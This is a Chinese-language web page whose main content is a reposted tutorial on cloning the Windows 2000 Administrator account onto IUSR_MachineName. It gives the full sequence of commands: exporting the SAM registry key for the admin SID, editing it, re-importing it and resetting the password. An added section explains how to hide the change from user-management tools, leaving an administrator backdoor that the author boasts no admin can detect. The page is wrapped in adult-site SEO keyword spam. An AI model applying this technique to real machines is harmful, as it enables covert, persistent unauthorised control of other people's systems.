色综合图-色综合图片-色综合图片二区150p-色综合图区-玖玖国产精品视频-玖玖香蕉视频

您的位置:首頁技術文章
文章詳情頁

克隆windows 2000管理員帳號

瀏覽:104日期:2023-08-27 10:02:39
首先要讓大家知道的概念是在Windows 2000和Windows NT里,默認管理員帳號的SID是固定的500(0x1f4),那么我們可以用機器里已經存在的一個帳號將SID為500的帳號進行克隆,在這里我們選擇的帳號是IUSR_MachineName(當然,為了加強隱蔽性,我們選擇了這個帳號,所有用戶都可以用以下的方法,只不過這個用戶較常見罷了),測試環境為Windows 2000 Server。 運行一個System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在該CMD Shell里面運行 regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4 這樣我們將SID 為500的管理員帳號的相關信息導出,然后編輯adam.reg文件,將adam.reg文件的第三行-[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4]最后的'1F4'修改為IUSR_MachineName的SID(大部分的機器該用戶的SID都為0x3E9,如果機器在最初安裝的時候沒有安裝IIS,而自己創建了帳號后再安裝IIS就有可能不是這個值),將Root.reg文件中的'1F4'修改為'3E9'后執行 regedit /s adam.reg 導入該Reg文件 然后運行 net user IUSR_MachineName Sometips 修改IUSR_MachineName的密碼(最好使用14位的密碼,越像IUSR_MachineName的密碼越好) OK,大功告成... 這樣,我們擁有和默認管理員一樣的桌面、一樣的Profile..... 而且,當我們運行 net localgroup administrators 時,看看結果: C:>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------ Administrator The command completed successfully. 再看看USER2SID的輸出結果: C:>user2sid Administrator S-1-5-21-1004336348-1078145449-854245398-500 Number of subauthoritIEs is 5 Domain is IDONTKNOW Length of SID in memory is 28 bytes Type of SID is SidTypeUser C:>user2sid iusr_machinename S-1-5-21-1004336348-1078145449-854245398-1001 Number of subauthorities is 5 Domain is IDONTKNOW Length of SID in memory is 28 bytes Type of SID is SidTypeUser 我想,再高明的管理員也看不到任何的異狀了...而且,隨便管理員改成什么密碼,我照樣可以用IUSR_MachineName,密碼為Sometips登陸...(沒有哪位大俠級的管理員喜歡經常修改IUSR_MachineName為其他的名字吧) ^_^,這算不算RootKit... 附: 1、感謝叮叮付出需要reinstall OS的代價... 2、任何用以上方法進行試驗所導致的系統無法使用均與偶無關,偶均不提供技術支持... ----------------------------------------------------------------------------- 叮叮 的補充完善 很多人提到使用了管理工具的用戶管理后,能夠發現IUSR_MachineName被提升了權限。 現給出解決辦法。 方法同上,不過這次修改內容多一些。即 這次要導出兩個key內容: 一個是adam提到的 regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4 然后另外一個是你需要修改那個賬號的值 regedit /e iusr.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00003E9 然后按照adam提到的修改adam.reg “將adam.reg文件的第三行--[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4]最后的'1F4'修改為IUSR_MachineName的SID” 現在,你還要從iusr.reg文件中復制一下內容 就是將iusr.reg文件中“'V'=hex:0”開始一直到iusr.reg文件結束部分復制下來 然后替換掉adam.reg中同樣位置的部分 最后使用 regedit /s adam.reg 導入該Reg文件 呵呵,別忘了給這個IUSR_MachineName改密碼哦。 hehe,ok,大功告成。 現在IUSR_MachineName賬號擁有了管理員的權限,但是你使用net.exe和 管理工具中的用戶管理都將看不到任何痕跡,即使你去察看所屬于的組和用戶。 都和修改前沒有任何區別。 好了,補充結束。
標簽: Windows系統
主站蜘蛛池模板: 国产成人看片免费视频观看 | 欧美69xx| 国产手机精品一区二区 | 国产成人深夜福利在线观看 | 欧美jizzhd欧美精品 | 国产精品区一区二区免费 | 国产亚洲精品线观看77 | 能看毛片的网址 | 国产亚洲精品激情一区二区三区 | 成人网18免费网站 | 久久精品综合国产二区 | 亚洲一区二区三区一品精 | 亚洲欧美国产精品专区久久 | 国产成在线观看免费视频成本人 | 九九在线免费视频 | 99re久久资源最新地址 | 成人午夜大片免费看爽爽爽 | 日韩 综合 | 国产香蕉国产精品偷在线观看 | 日韩欧美一区二区久久 | 91精品一区二区三区在线观看 | 一级一级毛片免费播放 | 成人精品一区二区久久久 | 久草免费资源 | 美国毛片亚洲社区在线观看 | 亚洲欧美综合久久 | 欧美日韩免费做爰视频 | 久久久国产成人精品 | 成人区在线观看免费视频 | 亚洲不卡影院 | 国产在线一区二区三区在线 | 经典日韩 | 欧美7777| 92午夜国产福利视频1000 | 国产一区二区三区四区五区 | 久久福利资源站免费观看i 久久高清精品 | 一区二区三区四区在线播放 | 91精品国产手机 | 欧美5g影院天天爽天天看 | 免费人成在观看 | 在线高清免费爱做网 |